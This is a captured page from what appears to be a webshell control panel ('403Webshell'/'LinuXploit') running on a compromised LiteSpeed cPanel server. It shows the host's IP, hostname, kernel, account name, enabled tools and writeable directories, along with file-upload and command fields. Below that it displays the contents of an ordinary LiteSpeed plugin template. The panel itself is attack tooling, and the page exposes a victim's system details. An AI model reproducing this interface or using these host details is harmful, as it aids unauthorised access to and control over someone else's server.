403Webshell
Server IP : 192.158.238.246  /  Your IP : 18.191.37.16
Web Server : LiteSpeed
System : Linux uniform.iwebfusion.net 4.18.0-553.27.1.lve.1.el8.x86_64 #1 SMP Wed Nov 20 15:58:00 UTC 2024 x86_64
User : jenniferflocom ( 1321)
PHP Version : 8.1.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/local/lsws/add-ons/cpanel/lsws_whm_plugin/View/Tpl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/local/lsws/add-ons/cpanel/lsws_whm_plugin/View/Tpl/RestartDetachedPHPConfirm.tpl
<?php

use LsPanel\View\Model\RestartDetachedPHPViewModel as ViewModel;

$iconDir = $this->viewModel->getTplData(ViewModel::FLD_ICON_DIR);

?>

<div id="heading">
  <h1>

    <?php if ( $iconDir != '' ) : ?>

    <span>
      <img src="<?php echo $iconDir; ?>/restartDetachedPHP.svg"
           alt="restart_detached_php_icon" />
    </span>

    <?php endif; ?>

    Confirm Operation... Restart Detached PHP Processes
  </h1>
</div>

<div>
  <p>
    This will inform LiteSpeed Web Server to restart all detached PHP processes
    the next time the server uses that PHP handler.
  </p>
</div>

<?php

$d = array(
    'back' => 'Back',
    'backDo' => 'main',
    'next' => 'Restart'
);
$this->loadTplBlock('ButtonPanelBackNext.tpl', $d);

Youez - 2016 - github.com/yon3zu
LinuXploit